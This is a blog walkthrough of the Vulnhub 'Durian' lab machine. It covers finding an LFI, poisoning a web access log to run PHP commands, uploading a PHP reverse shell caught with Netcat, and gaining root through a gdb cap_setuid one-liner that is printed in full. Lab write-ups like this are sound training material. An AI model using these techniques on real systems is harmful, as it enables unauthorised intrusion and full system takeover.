Where Notes Work
Durian Vulnhub
Walkthrough of Durian Vulnhub.
In this post, I’ll show you guys, how I solve Durian Vulnhub Box, basically, this is a walkthrough of Durian.
Machine IP: 192.168.43.184
By doing nmap, I found a website running on port 80, else, I didn’t found anything vulnerable or suspicious.
note: A WordPress site is also running on /blog path.
after brute-forcing the web directory, I found the cgi-data page which redirects to the vulnerable LFI page,
checking for /etc/passwd file it’s confirmed, that, it’s vulnerable to LFI,
after giving some time and doing some research, I found that there is a log file named durian.log, which is vulnerable to log poisoning, and access.log is a file where web logs are stored,
log path: /var/log/durian.log/access.log
after that using burp suite, I tried to execute the command using PHP, and it’s worked,
note: it may take 2-8 attempts to execute the command.
so, we can see that it is sending the response, after that, I tried to upload the php-reverse-shell to the /var/www/html/, but it does not work, after many tries, I try to upload the shell to /var/www/html/blog/ path, then it gets uploaded.
after that, start Netcat listener, and execute the shell.php file by visiting the /blog path, on the website: 192.168.43.184/blog/shell.php,
now, we got the shell as www-data user, which is web user, after that I tried to find some suspicious configurations, but didn’t find anything,
but checking for capabilities, I find that there are two binary capabilities,
by searching “/usr/bin/gdb = cap_setuid+ep” on google I found that it can be used for privilege escalation just setting the uid value to 0, more detailed information about Linux Privilege Escalation using Capabilities can be found here,
$ /usr/bin/gdb -nx -ex 'python import os;os.setuid(0)' -ex '!sh' -ex quit
see, we got the root, The tricky part of the box is finding the log file.
If you face any problem, let me know in the comment section.